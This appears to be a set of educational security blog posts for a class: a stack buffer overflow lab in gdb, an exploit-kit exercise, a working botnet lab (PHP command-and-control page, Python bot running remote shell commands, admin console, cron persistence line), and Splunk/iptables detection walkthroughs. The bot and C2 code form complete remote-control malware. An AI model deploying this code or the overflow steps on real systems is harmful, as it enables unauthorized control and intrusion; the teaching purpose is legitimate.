Thursday, December 7, 2017

Prepare, Bait, Hook, Execute and Control - Buffer Overflows

This post is the third of four that I am planning to write about social engineering, specifically phishing.  The form of phishing that I am going to talk about is where an email containing a link or an attachment is sent to a user, the email entices the user to click the link or open the attachment, a payload executes, and the attacker then gains control of the infected computer.

Here are the links to the previous 2 posts related to this topic:
Prepare, Bait, Hook, Execute and Control - Exploit Kits
Prepare, Bait, Hook, Execute and Control - Phishing

Lab

In the previous post, you read about exploit kits and how they work.  As described by Palo Alto, after a device hits an infected landing page, the device is evaluated against a series of exploits to see which would work, the exploit is triggered, and then the payload is delivered.  The exploit that was triggered was, I believe, an Adobe Flash heap-based buffer overflow.

In the post below I would like to explore how an exploit might be discovered using fuzzing, then how overwriting a buffer can give you control of what is called the extended instruction pointer, or EIP.  With control of the EIP, you can change the next instruction to be executed to an instruction of your choosing.  This is different than the Adobe Flash heap-based buffer overflow, however this is where you may need to begin to build a foundation of understanding.

1. The buffer overflow example I am going to demonstrate is a simple stack-based buffer overflow.  It is a very simple example, but remember that when you learned to ride a bike, you probably started with training wheels.

2. First we need a VM that is 32-bit.  I am going to use the Billu_b0x VM that we used previously.  The first step is to briefly change the network interface to NAT and install gdb.

Command: apt-get update; apt-get install gdb

* Change the network interface back to host-only when you are done.  Remember not to trust what you did not build and secure, and even then be careful.

3. GDB is short for the GNU Debugger.  We will use it to look at the registers and memory as we conduct the exercises below.  Now let's build a vulnerable C program that we can utilize.  On Billu_b0x, after I connected with SSH from my host, I created a directory called prog.

Command: mkdir prog
Command: cd prog

4. Below is the vulnerable C program that I created and will be using.  I called the program c_prog.c.



#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
 char buff[180];
 if (argc == 2) {
  strcpy(buff, argv[1]);
  if (strcmp(buff, "aS3cr3tP@ssword")) {
   printf("You shall not pass!\n");
  }
  else {
   printf("You may enter at your own risk...\n");
  }
 }
 else {
  printf("To login the syntax is: %s <password>\n", argv[0]);
  exit(0);
 }
 return 0;
}
  


To step through the program: I set up a character buffer of 180 characters.  The first argument is the name of the program being executed and the second argument is the password.  If I do not provide a password, it reminds me of the syntax that I need to use.  If the password does not match, it does not log me in.  If it does match, it displays a message in the console to enter at your own risk.


5.  After creating the simple program I compiled it using gcc.

Command: gcc c_prog.c

*We will ignore the warnings that are displayed for now.  If there are any errors, please correct them by verifying your code.

6. When you compile a program using gcc and do not specify an output filename, it gives the compiled program the name "a.out".  Let's test "a.out" to verify it is working.
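As a quick sanity check, you can run it with a wrong password and then with the password hard-coded in the source; based on the source above, the first run should print "You shall not pass!" and the second "You may enter at your own risk...".

Command: ./a.out wrongPassword
Command: ./a.out aS3cr3tP@ssword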



7.  Now I am going to fuzz the password field to see how long the buffer is.  Fuzzing the password does not mean guessing it or brute forcing it; we are sending characters of various lengths to see if we can get the program to crash.
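If you would rather script the fuzzing than type the attempts by hand, below is a minimal sketch of the idea.  It assumes a.out sits in the current directory; adjust the lengths to taste.

#!/usr/bin/python
# Minimal fuzzing sketch: run ./a.out with passwords of increasing length
# and print the return code so a crash (segfault/abort) stands out.
import subprocess

for length in range(50, 201, 50):
 p = subprocess.Popen(["./a.out", "A" * length],
                      stdout=subprocess.PIPE, stderr=subprocess.PIPE)
 out, err = p.communicate()
 print "Length %d -> return code %d" % (length, p.returncode)
 if err:
  print err.strip()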


8.  Following the commands I executed above, I first sent 50 letter A's into the program as the password, then 100, 150 and 200.  When I sent 200, it came back stating "stack smashing detected" and then displayed a segmentation fault.  We can conclude that the buffer is between 150 and 200 characters long.  Let's try another round of fuzzing to be more precise about how long the buffer is.


9. From the above screenshot we can see that the buffer is between 180 and 184 characters in length, because it crashes at 185 characters.  With a little more testing you can tell that the acceptable buffer length is 180 characters.

10.  Before we continue, we need to make a couple of adjustments to be able to complete the lab.  The first adjustment: Billu_b0x, like modern operating systems, randomizes the placement of the stack in memory (ASLR) so that it is less predictable to overwrite; other protections exist as well.  You can study more about that in your spare time.  As root, execute the following command to disable the randomization.

Command: sysctl kernel.randomize_va_space=0

11.  The gcc compiler also has protection built in to protect the stack.  The following command will recompile c_prog.c without the stack protector and will include the debugging information we need for future exercises.

Command: gcc -ggdb -fno-stack-protector c_prog.c

12.  After you complete steps 10 and 11, repeat the fuzzing from step 7.  This time, instead of "stack smashing detected", you should see different results, as shown below.



13.  Let's use gdb to demonstrate what we are trying to accomplish by smashing the stack.

Command: gdb -q a.out
(gdb) list
(gdb) <enter>
(gdb) <enter>



14.  As you can see above, we can list the code.  Because we compiled c_prog.c with -ggdb, we can see the source code in the debugger.  On line 10 we copy our input into the buffer.  The buffer is built for 180 characters and we are going to push 500 characters into it, which overflows the buffer.  To see this in the debugger, we are going to place a breakpoint on line 11.  A breakpoint stops the execution of the program at that line.

(gdb) break 11                 OR                 (gdb) b 11 

* The breakpoint is not strictly necessary; however, breakpoints are a gdb concept you need to know.

15.  Now, to run the program, type run followed by the password that the program is looking for, exactly as if we were running it in the terminal.

(gdb) run testPassword


16.  Notice that argv=0xbffff7f4 is set.  You can then type step to step through the rest of the program.  Eventually the program will terminate, but you should see, minus the code, what would be displayed in the terminal.

17.  Now let's run the program again inside the debugger.  If you had to leave gdb and rerun it, you will need to set up the breakpoint on line 11 again.  This time we are going to overflow the stack by using python to write 500 A's (0x41) into the buffer.

(gdb) run `python -c 'print "A"*500'`




18.  Notice that argv=0x41414141; if you convert the hex to ASCII, you can see that we have overwritten the argument with AAAA.  That means I can control the program, because I can overwrite what is in memory: no bounds checking prevents me from putting more data into the buffer than it was sized for.
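If you want to confirm the hex-to-ASCII conversion yourself, a quick one-liner in the Python 2 interpreter already on the VM will do it:

Command: python -c 'print "41414141".decode("hex")'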

19.  Let's rerun the program in the debugger, inserting exactly 180 A's into the buffer.  We are going to examine the ESP register.  ESP is the extended stack pointer; it points to the top of the stack.  So we are going to step through the program and then, before it finishes, examine 200 words of memory in hex starting at the address in ESP.

(gdb) x/200x $esp


20.  In the above image you can see the 180 A's we inserted onto the stack.  To demonstrate smashing the stack, that is, overwriting the EIP register, we are going to use the letter B so we can see it in the debugger.

(gdb) run `python -c 'print "A"*180 + "B"*4'`
(gdb) step (3 times)
(gdb) x/200x $esp


21.  In the above image we place 184 characters into the buffer, which overflows its designated size.  You can see 0x42424242, showing where we overflowed the buffer.  Compare it to the image in step 19: there we had three 0x00000000 values and now we only have two.  If you step 2 more times in the code it will exit normally.

22.  Let's change from adding 4 B's to 8 B's.

(gdb) run `python -c 'print "A"*180 + "B"*8'`
(gdb) step (3 times)
(gdb) x/200x $esp

23.  In the steps above we have talked about the ESP register and the EIP register.  If we can control the EIP register, then we control the address of the next instruction that is executed.  First, let's learn how to display the registers in gdb.

(gdb) info registers           OR  (gdb) i r

24.  Repeat steps 20 through 23 until you can overwrite the EIP register, as displayed in the image below.  Try to do it by adding 4 B's at a time.


25.  After you overwrite the EIP register, examine memory starting at the ESP register as we did above.  We are looking for a memory address whose contents are consistent between runs.  To speed up this process I am not going to set a breakpoint.


26.  We need to take note of two things.  The first is a memory address where the A's are consistently placed.  I am going to pick the following.

Memory Address: 0xbffff890          (Note: yours may be different)

Now go back and run the program in the debugger and verify that this address consistently has 0x41414141 next to it. 

27.  The next thing I need to calculate is how far into the 180-character buffer that memory address sits, measured in A's.  We do not need to be exact, as long as the total number of characters we send still equals 180.

Number of A's:  30

28.  Let's imagine that the code I want to execute is 50 characters long.  I would run the program in gdb with the following command, with my code indicated by the letter C.

(gdb) run  `python -c 'print "A"*30 + "C"*50 + "A"*100 + "B"*16'`


29.  Now that we have introduced the code, we want the EIP register to hold the memory address 0xbffff890 so that the code at that address is executed.  To do this we need to modify the last 4 B's.  Without going into much detail, x86 stores multi-byte values in memory in little-endian format, so we need to write the memory address in little-endian byte order, as shown below.

(gdb) run `python -c 'print "A"*30 + "C"*50 + "A"*100 + "B"*12 + "\x90\xf8\xff\xbf"'`
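If you want to double-check the little-endian byte order, Python's struct module can produce it for you.  The address below is the one I picked in step 26; yours may differ.

Command: python -c 'import struct; print struct.pack("<I", 0xbffff890).encode("hex")'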



30.  Notice that we have controlled the EIP register and pointed it at the location where we could place our code.  This is where I am going to end this post.  However, if you would like to go further with generating a payload and learning more about exploit development, study the following links.

Binary Payloads - Metasploit Unleashed

Corelan Exploit Writing Part 1

Also study about:
More and More and More about Smashing the Stack on Windows and Linux
Heap Spraying
Use-after-Free
....

Check out the pwn2own and other similar competitions.  Exploit development may be difficult to learn but it pays very well if you are great at it.

Monday, December 4, 2017

Prepare, Bait, Hook, Execute and Control - Exploit Kits

This post is the second of four that I am planning to write about social engineering, specifically phishing.  The form of phishing that I am going to talk about is where an email containing a link or an attachment is sent to a user, the email entices the user to click the link or open the attachment, a payload executes, and the attacker then gains control of the infected computer.

Here is the link to the first post called, "Prepare, Bait, Hook, Execute and Control - Phishing"

Lab

1. In the first post we explored what happens after a host is infected and how it can be controlled as a bot in a botnet.  This control can be conducted through a C2 server, which is usually another infected device on the internet.  For this post we are going to evaluate what happens when a person clicks on a malicious link inside an email or browses to a website that is infected.

2.  When someone visits an infected website, it may redirect them to an exploit kit.  An exploit kit is used to establish control of the computer if a vulnerability exists.  I am now going to refer to a reference that you should read: it defines what an exploit kit is, how it works, and its different stages.  The page was created by Palo Alto.  Here is the link to "What is an Exploit Kit?".

3.  Now, with an understanding of how an exploit kit works, I am going to refer you to another site.  Malware-Traffic-Analysis.net has a scenario that I would like you to work through.  The scenario covers how a computer became infected by visiting a compromised site that led it to an exploit kit.

Before you start working on the scenario, skip to step 4 in this post and setup Security Onion as an Analyst VM.

Please answer and show your work based on the scenario presented.  Remember, this is being written for a college class being taught soon.  Feel free to look at the answers posted on the site, but the work you submit needs to be your own.  Here is the link to the scenario on Malware-Traffic-Analysis.net.

Remember that the payload in the pcap that you are analyzing potentially contains malware.  Be careful with it.

4. To set up Security Onion so that you can replay the pcap, you can build an Analyst VM as discussed in this post.

I apologize if some of you do not appreciate the references to other materials in my posts.  I felt the references discussed and presented how an exploit kit works better than I could.

Enjoy...

Wednesday, November 29, 2017

Prepare, Bait, Hook, Execute and Control - Phishing

This post is one of four that I am planning to write about social engineering, specifically phishing.  The form of phishing that I am going to talk about is where an email containing a link or an attachment is sent to a user, the email entices the user to click the link or open the attachment, a payload executes, and the attacker then gains control of the infected computer.

To explore this topic, I am going to start by going through the process backwards.  I am going to start by first exploring how the control of the infected computer occurs as it becomes a bot.

I am going to use the zico2 virtual machine as if it were a web server on the internet.  My host will act as the controller of the bots through the web server, and I will also simulate some infected computers that communicate with the web server.

1.  We are going to use PHPLiteAdmin to create a SQLite3 database called command, then a table called botInfo with 6 fields as shown below in the screenshot.

 
2.  Walking through the table: id is the unique identifier of each task row, machineID is the unique identifier of the bot, osType is whether it is Linux or Windows, httpCommand is the command that is pending to be run on the bot, httpResults holds the results of the command, and executed indicates whether the httpCommand has been executed.
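If you would rather create the database from a script instead of PHPLiteAdmin, a sketch like the one below would work.  The database path and column names match what view.php expects later in this post; the column types are my assumption.

#!/usr/bin/python
# Sketch: create the "command" SQLite3 database and the botInfo table.
import sqlite3

conn = sqlite3.connect('/usr/databases/command')
conn.execute('''CREATE TABLE IF NOT EXISTS botInfo (
 id INTEGER PRIMARY KEY AUTOINCREMENT,
 machineID TEXT,
 osType TEXT,
 httpCommand TEXT,
 httpResults TEXT,
 executed TEXT)''')
conn.commit()
conn.close()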

3.  If you observe the permissions of the view.php file under /var/www, the zico account has access to modify the file.  You need to figure out how to log in with the zico account to continue with this exercise.


4. In the previous walkthrough we identified that the www-data user is used to run the website.  With the above permissions, this user also has the ability to modify the website.

Challenge: Correct the permissions so that the pages still load but www-data does not have permission to write to the www directory, its files, or any subdirectories.


5.  Let's modify the view.php file to be used as the file for our command and control (C2) server.



Below is the code shown above, with the exception of the first and last lines.  You may need to reformat the code as you copy it out.


        if ($_GET['page']) {
                $page =$_GET['page'];
                include("/var/www/".$page);
        }
        elseif ($_GET['action']) {
                $action=$_GET['action'];
                if ($action=='getCommand') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=getCommand&mID=test
                        $machineID=$_GET['mID'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = 'SELECT id, httpCommand FROM botInfo WHERE machineID="' . $machineID . '" AND executed="N" LIMIT 1';
                        $results = $db->query($query);
                        if (count($results) > 0) {
                                while ($row = $results->fetchArray()) {
                                        echo $row[0] . "|" . $row[1];
                                }
                        }
                        else {
                                echo "Nothing";
                        }
                }
                elseif ($action=='addBot') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=addBot&mID=test27
                        $machineID=$_GET['mID'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = "INSERT INTO botInfo (machineID, httpCommand, executed) VALUES('" . $machineID . "','" . base64_encode('ls') . "','N')";
                        echo $query;
                        $results = $db->exec($query);
                        echo "Added";
                }
        }
        elseif ($_POST['action']) {
                $action=$_POST['action'];
                if ($action=='postCommand') {
                        # Example to test with: curl -d "action=postCommand&mID=test&id=1&httpResults=test9" -X POST http://172.16.216.132/view.php
                        $machineID=$_POST['mID'];
                        $id=$_POST['id'];
                        $httpResults=$_POST['httpResults'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = 'UPDATE botInfo SET httpResults="' . $httpResults . '", executed="Y" WHERE id=' . $id . ' AND machineID="' . $machineID . '"';
                        $results = $db->exec($query);
                        echo "Completed";
                }
        }
        else {
                echo "view.php?page=tools.html";
        }

6.  I will quickly step through the code above.  The page initially allows you to pass the page parameter with the tools.html file.  This could also be used to conduct directory traversal and access files throughout the file system that the www-data user can read.

We added logic so that if the action parameter with the value getCommand and an mID (machineID) are passed, we query the SQLite3 database for the first command that needs to be executed on the infected host, then return it as if it were a web page viewed in a web browser.  Remember that information passed as a GET parameter will, by default, show up in the logs of the web server.

The other action, addBot, adds a new bot to the database.  This is used when a new computer infected with our proof-of-concept executable comes online.

The second section handles the POST parameter action with the value postCommand, which indicates the bot executed the given command and is returning the results through httpResults.  The page then responds that the action was "Completed".

7.  Well, that was simple.  Let's move on.  We are now going to create the bot: proof-of-concept code that would run on an infected computer to control it.  I am going to utilize python.

8. Below is the code for a python bot that will communicate with the PHP page called view.php. 




#!/usr/bin/python
# Building this bot to only work with linux
# Built for educational use only...

import base64
import hashlib
import random
import datetime
import urllib
import urllib2
import time
import subprocess

c2server="http://172.16.216.132/view.php"
sleepTime = 10 # Sleep for 10 seconds between requests going to the c2server

def generateMachineID():
 # This function generates a random machine ID based on the time and a random number
 machineID = str(datetime.datetime.now()) + str(random.randint(1,10000)) 
 machineID = hashlib.sha1(machineID).hexdigest() # Will return as machineID
 return machineID

def addBot(mID):
 # This function adds the bot to the C2Servers SQLite3 database
 url = c2server + "?action=addBot&mID=" + mID
 urllib2.urlopen(url).read()

def getCommand(mID):
 # This function gets the next command from the C2 to execute
 url = c2server + "?action=getCommand&mID=" + mID
 u = urllib2.urlopen(url)
 i = u.read()
 if "|" not in i:
  # No pending command; return a value that main() recognizes as "Nothing"
  return "0", base64.b64encode("Nothing")
 info = i.split("|")
 print "Received - Task ID: " + info[0] + "\tCommand: " + base64.b64decode(info[1])
 return info[0], info[1]

def execCommand(c):
 # This function takes the command it received and executes it
 c = base64.b64decode(c)
 comExec = subprocess.Popen(str(c), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
 STDOUT, STDERR = comExec.communicate()
 if STDOUT:
  encodedOutput = base64.b64encode(STDOUT)
 else:
  encodedOutput = base64.b64encode("Invalid Command...")
 return encodedOutput

def postCommand(mID, tID, r):
 # This function returns to the c2server the results of the command
 url = c2server
 data = urllib.urlencode({'action' : 'postCommand',
     'mID' : mID,
     'id' : tID,
     'httpResults' : r})
 u = urllib2.urlopen(url=url, data=data)

def main():
 machineID = generateMachineID() # Generate a random machine identifier
 addBot(machineID)  # Communicate to the C2 Server and Add this bot
 while True:   # Don't exit until program fails
  time.sleep(sleepTime) # Wait for the specified time 
  taskID, command = getCommand(machineID) 
  if base64.b64decode(command)=='Nothing':
   time.sleep(sleepTime*3)
  else:
   time.sleep(sleepTime)
   results = execCommand(command)
   time.sleep(sleepTime)
   postCommand(machineID, taskID, results)

if __name__ == "__main__":
 main()        

To talk through the code: it generates a unique machine ID, adds the bot's machine ID to the database housed on the site, gets a command if one exists, executes the command, and then posts the results back to the site.

9.  The bot, if configured correctly, will persist on the system and be triggered to start or restart based on a scheduled task or an action taken by the user.
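For example, on Linux the scheduled task could be as simple as a cron entry that relaunches the bot at boot; the path to the script below is hypothetical.

Command: (crontab -l 2>/dev/null; echo "@reboot python /home/user/bot.py") | crontab -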

10.  Awesome, now we need an administration script to manage which commands we want the bots to execute, fetch the results, and remove completed tasks from the SQLite3 database to keep it cleaned out.  This will require us to add to the view.php page and build a new python script to conduct the actions.

Below is the python script for the administration of the bots through view.php.




#!/usr/bin/python
# Building this utility to only work with linux
# Built for educational use only...

import base64
import urllib
import urllib2

c2server="http://172.16.216.132/view.php"
sleepTime = 10 # Sleep for 10 seconds between requests going to the c2server
log = open('log.txt','a')

def getExecuted():
 # This function gets the machine IDs that are in the database
 url = c2server + "?action=getExecuted"
 u = urllib2.urlopen(url)
 i = u.read()
 items = i.split('|')
 if items[1] == "Nothing":
  print "No commands executed to be return..."
  return "Nothing"
 else:
  print "Task ID: " + items[0] 
  print "Bot ID: " + items[1]
  print "$> " + base64.b64decode(items[2])
  print base64.b64decode(items[3])
  print
  # Record to a log file for future reference...
  log.write("BotID: " + items[1] + "\n")
  log.write("?> " + base64.b64decode(items[2]) + "\n")
  log.write(base64.b64decode(items[3]) + "\n\n")
  return items[1]
 return "Nothing"
 
def selectBot(botList):
 count = 1
 for b in botList:
  print str(count) + ". " + b
  count=count+1
 print
 select = raw_input("> ");
 botNumber = int(select) - 1
 return botList[botNumber]

def sendCommand(b):
 command = raw_input("Command> ")
 url = c2server + "?action=sendCommand&mID=" + b + "&httpCommand=" + base64.b64encode(command) 
 urllib2.urlopen(url).read()
 print
 print "Sent the command: " + command
 
def purgeOld():
 url = c2server + "?action=purge"
 urllib2.urlopen(url).read()
 print
 print "Sent command to purge old information."

def main():
 bots = []
 botSelected = 'None'
 while True:
  print
  print "C2 Server URL: " + c2server
  print "1. Get Executed Commands"
  print "2. Select Bot - Currently Selected: " + botSelected
  print "3. Send Command to Execute"
  print "9. Purge Old Commands"
  print "Q. Quit"
  print
  selection = raw_input("> ")
  if selection == "1":
   newBot = getExecuted()
   if newBot <> "Nothing":
    if newBot not in bots: 
     bots.append(newBot)
     print "Added bot: " + newBot
  elif selection == "2":
   botSelected = selectBot(bots)
  elif selection == "3":
   sendCommand(botSelected)
  elif selection == "9":
   purgeOld()
  elif selection.lower() == "q":
   log.close()
   exit(0)

if __name__ == "__main__":
 main()        


To walk through the above code: you are presented with a menu.  If bots are running, you can retrieve the executed commands; each command is displayed and logged if available.  You can then select a bot and send commands back to the database to be executed.  You can also purge old commands.

11.  Now that we have a script to administer the bots, let's add the following 3 sections to the view.php file underneath the addBot elseif.




                 elseif ($action=='sendCommand') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=sendCommand&mID=test27&httpCommand=dddd
                        $machineID=$_GET['mID'];
                        $command=$_GET['httpCommand'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = "INSERT INTO botInfo (machineID, httpCommand, executed) VALUES('" . $machineID . "','" . $command . "','N')";
                        $results = $db->exec($query);
                        echo "Added Command";
                }
                elseif ($action=='getExecuted') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=getExecuted
                        $db = new SQLite3('/usr/databases/command');    
                        $query = "SELECT count(*) FROM botInfo WHERE executed='Y' LIMIT 1";     
                        $results = $db->query($query);
                        while ($row = $results->fetchArray()) {
                                $rows = $row[0];                # Calculate the rows returned by the query
                        }
                        if ($rows > 0) {                        # If number of rows is greater than 0 then continue
                                $taskID = 0;
                                $query = "SELECT id, machineID, httpCommand, httpResults FROM botInfo WHERE executed='Y' LIMIT 1";
                                $results = $db->query($query);
                                while ($row = $results->fetchArray()) {
                                        echo $row[0] . "|" . $row[1] . "|" . $row[2] . "|" . $row[3];
                                        $taskID = $row[0];
                                }
                                $query = "UPDATE botInfo SET executed='D' WHERE id=" . $taskID;
                                $results = $db->exec($query);
                        }
                        else {
                                echo "Nothing|Nothing|Nothing|Nothing";
                        }
                }
                elseif ($action=='purge') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=purge
                        $db = new SQLite3('/usr/databases/command');
                        $query = "DELETE FROM botInfo WHERE executed='D'";
                        $results = $db->exec($query);
                        echo "Purged";
                }       

To walk through the commands added to view.php: sendCommand is where the admin console submits a command to be run by a specific bot, identified by machineID.

The getExecuted action gathers and returns commands that have been executed.

The purge action deletes the rows in the database whose commands have been executed and already returned to the admin console.

12.  Now let's test our proof-of-concept.  On my host I launch a program called "Terminator", which allows you to split the window into multiple terminal panes.  Below are screenshots of the admin console and 4 bots running on my host simulating a small botnet, as well as what the SQLite3 database looks like.

The 4 bots communicating:


The admin console communicating with the 4 bots through the web page:


What the SQLite3 database looks like:


13.  Now that we can simulate a botnet let's see what it looks like in Splunk as the logs from the web server are read by the forwarder.

Challenge:  Setup the botnet with a simulation of 4 bots, the zico2 vulnerable web server and an admin console.

Challenge:  Setup the Splunk Forwarder to send the logs to a Splunk Server docker instance.  Study the logs and identify the bot activity.

14.  Understand that if a web site is compromised, a miscreant may change files.  This is where a file integrity monitoring (FIM) solution is helpful.  One of the many tools is called OSSEC.  You can set up OSSEC to record to a log file and then have the Splunk Forwarder send the logs.

Challenge: Setup OSSEC to watch the /var/www directory for file changes.  Change view.php and then resave it and verify that the log detects it.

Challenge: Setup Splunk to receive the OSSEC logs.

The files that were created above can be pulled from my Github page located here.

Challenge: What is pivoting, as it is defined in penetration testing?

Challenge: If you had the access that the bot has, what would you look for to escalate privileges?

The goal of this post is for you to understand how a botnet may function, how a C2 server may function, and the tools and techniques that you can use to detect a bot or detect when a site has been compromised.

Friday, November 24, 2017

Docker with Splunk and Seattle 0.0.3 Walkthrough

For this post, I am going to quickly walk through the setup of Splunk using a docker image; refer to the previous post for details on how to do this.  With Splunk configured, I am going to go back to the walkthrough of Seattle 0.0.3, configure the logs to come in, and then we are going to work through the walkthrough and see what logs are being generated.

The goals of this post are:
1.  To show how analysts could detect the attack occurring using a SIEM
2.  To show what the attack/walkthrough would look like in a SIEM
3.  To learn about additional tools that you can use to conduct or mitigate the attack.

Lab

1. In the previous post I walked through setting up a docker image called splunk/splunk and installing a Splunk Forwarder on the vulnerable image I was working with.  I am going to conduct the same with the Seattle 0.0.3 vulnhub VM.

2. Briefly, my setup is a VM running Kali Linux (172.16.216.130) with docker running.  I am running the docker image for Splunk (172.17.0.2) on Kali.  The networking on the Kali VM is set up to be host-only.  From my linux host I can reach the 172.16.216.130 VM.  I am going to use the host's IP Address and NAT the ports I need for Splunk.  On the Kali VM I have ssh enabled and connect with the "-X" option to X11-forward everything to my host.

Command on Kali to Start SSH: /etc/init.d/ssh start
Command on Host to Forward X11: ssh -X root@172.16.216.130

4.  Then I started the docker service and loaded the splunk image.

Command: service docker start
Command: docker run -it -p 172.16.216.130:8000:8000 -p 172.16.216.130:9997:9997 splunk/splunk

5.  Then I load the Seattle 0.0.3 VM (172.16.216.131) as a second VM.  Observe that this VM is 64-bit.  I need to transfer the Splunk Forwarder to this VM.  In the previous post I used secure copy over SSH.  In this post I am going to use a Python SimpleHTTPServer to host the files and then pull them from the Seattle VM.  I use this method to transfer or load files occasionally when I am working on vulnerable images.

First: Navigate to the directory containing the files you need to host in a simple web server.  In the example below I have a folder called Splunk with the 32-bit and 64-bit splunk forwarders.  Observe that this VM is built on Fedora 64-bit, so you need the rpm package of the Splunk Universal Forwarder.  The simple server will serve all of the files in the given directory.

Command: python -m SimpleHTTPServer
Note: You can follow the command with a specific port number.  By default it serves the files on port 8000.
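For example, to serve the files on port 8080 instead of the default:

Command: python -m SimpleHTTPServer 8080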



6.  From the Seattle 0.0.3 virtual machine, pull the file that you need using bash, assuming you have root on the Seattle VM through SSH.  I built a script in bash to demonstrate using native bash commands to download the file.  You can simplify the script below if you need to...

Challenge: Create the script, change permissions, execute it, and download the Splunk Universal Forwarder for Fedora/Red Hat.


7.  The VM has a GB keyboard layout.  You can change this by modifying the 2 files listed below; however, as an attacker, if you do make the change, make sure you change it back.  I often find that attackers do a fair job of cleaning up but often miss the small things they changed.  Google how to change the keyboard layout in Fedora as part of the challenge.

/etc/locale.conf
/etc/vconsole.conf

8. Install the Splunk Universal Forwarder.

Command: rpm -ivh sf.rpm


9.  After Splunk is installed, set up forwarding to the Splunk docker image on the Kali VM (172.16.216.130) that has the ports NATed.

10.  Enable logging for queries in the MariaDB server that is running.



11.  Then restart the service in Fedora for the mariadb server.

Command:  systemctl restart mariadb.service

12.  Now add the following files so that the Splunk Universal Forwarder can send them to the Splunk server running on the Kali VM.

/var/log/mariadb/error.log
/var/log/mariadb/query.log
/var/log/httpd/access_log

13.  Before we move on, let's work with the iptables firewall that is running to generate logs of the activity.  On this VM in the /root home directory is a script called "shieldsup.sh".  We are going to copy and then modify that script to keep it simple.

Command: cp shieldsup.sh v2.sh



14.  Modify the v2.sh file, adding logging to the script that configures the iptables firewall.  Below is how I modified it.  The firewall could be simplified both by consolidating the logging policies and by using bash for loops.


15.  The logs for the firewall will show inside of the file /var/log/messages.  If you were to capture a few of them, below is a screenshot of what you would see.


16.  Set up the Splunk Universal Forwarder to also read and send /var/log/messages to the Splunk server.  Below is a screenshot of the monitors I have enabled for the Seattle 0.0.3 VM.


17.  Run an nmap scan against the Seattle VM to verify you are receiving logs.  Also verify that the script you wrote for the firewall logging has executed.

18.  Verify in Splunk that you are receiving the iptables, httpd and mysql logs.


19.  Now going to the walkthrough, let's start by scanning with netcat.


20.  Use the Splunk Search like you would conduct a google search.  Run the following search:

Search: index=main DPT=76

This searches the main index of Splunk for the string DPT=76 within the logs.  DPT is an abbreviation for destination port.  You should see results similar to what is below.  In step 19 we scanned destination port 76.


21.  You can also use conditional statements in your searches.  For example, here is how to see the logs generated by scans going to destination ports 76 and 77.

Search: index=main (DPT=76 OR DPT=77)



22.  Now we are going to request the home page of the web site using netcat.

Command: nc 172.16.216.131 80
String: GET / HTTP/1.0

23.  Looking in Splunk, we see the following logs after searching specifically for the log source /var/log/httpd/access_log.

Search: index=main source="/var/log/httpd/access_log"


 
Looking closer at the log, where the user-agent would normally appear you see a "-".  If you have a web application firewall or another method to filter on a blank user-agent, you could block this scan.  (The Apache web server has filtering capabilities that could be utilized as well.)

24.  Now we are going to use OWASP DirBuster and hit the home page.  Observe that each hit records a log entry.  Also, in the user-agent you can see that we are utilizing OWASP DirBuster.


Challenge: Identify how to change the user-agent in dirbuster.

25.  Let's configure iptables to observe the new connections coming into the firewall on port 80.  If the connection is NEW and hits the firewall 5 times within 120 seconds then log and drop the connection.

Change the firewall script on the Seattle 0.0.3 VM and apply it.  Pay particular attention to how the LOG-ACCEPT-INPUT-NEW policies are created.  I copied the previous firewall script to a new one so that, if I had to, I could revert to it.

Note:  If you make changes to the firewall script, you need to run ./shieldsdown.sh and then ./v3.sh to reset the counters iptables maintains for deciding whether an IP Address should be blocked.
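For reference, rate-limit rules with that behavior can be built with the iptables "recent" module.  The lines below are a sketch of the idea, not the exact contents of my v3.sh script.

Command: iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --name HTTP --set
Command: iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --name HTTP --update --seconds 120 --hitcount 5 -j LOG --log-prefix "LOG DROP INPUT "
Command: iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --name HTTP --update --seconds 120 --hitcount 5 -j DROP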



26.  If the firewall is setup and functioning correctly you should see that dirbuster observed multiple timeouts while it was scanning, due to it being blocked.  Dirbuster will now pause and wait.


27.  If you search in Splunk you will see the behavior of the connection to change from LOG ACCEPT INPUT NEW to LOG DROP INPUT. 

Search: index=main DPT=80


28.  Let's look specifically at the Splunk logs for /var/log/httpd/access_log.  I modified DirBuster to use a unique user-agent.  Notice the search only returns the 303 logs from that scan, versus a potential of thousands of logs.  Also, in the search I specified the log source and a string that would be unique in the logs.

Search: index=main source="/var/log/httpd/access_log" "DirBuster-1.0-RC1-iptables-test2"


Being able to search using an attacker's IP Address, a unique user-agent, or other information that is unique about an attack is worth gold in finding an attacker and what they have done.  You can also associate multiple IP Addresses with an attack that is occurring.

On the attacker's side, you should try to stay hidden.  Learn how to decrease the amount of traffic you generate and how to blend in with existing traffic.  I have heard this called "flying beneath the radar", or trying not to draw attention to yourself.

29.  The next step in attacking the Seattle 0.0.3 VM was to fuzz the password of the user. 

Challenge:  Fuzz the password for the admin user and observe if the iptables rules that we put in-place above will mitigate this attack also.

30.  The next item was to create stored XSS in a post to the blog after you log in as admin. 

Challenge:  Create a search in Splunk to identify XSS by searching for the keyword script or alert.

Monday, November 20, 2017

Docker with Splunk and Billu B0x forwarding Apache2 and mysql logs

For this post, I am going to walk through the setup of Splunk using a docker image.  With Splunk configured I am going to go back to the walk-through of Billu b0x, configure the logs to come in, and then we are going to go through the walk through and see what logs are being generated.

The goals of this post are:
1.  To show how analysts could detect the attack occurring using a SIEM
2.  To show what the attack/walkthrough would look like in a SIEM
3.  To learn what you could change in the attack/walkthrough to be more stealthy in the methods utilized and how tools are used

Lab

1.  On my Kali box where docker is installed, start the service.

Command: service docker start

2.  Then search for docker images for the keyword "splunk"

Command: docker search splunk

3.  The image that I selected is called splunk/splunk.  So I am going to pull down that image.  We are trying to get version 7 of splunk.

Command: docker pull splunk/splunk

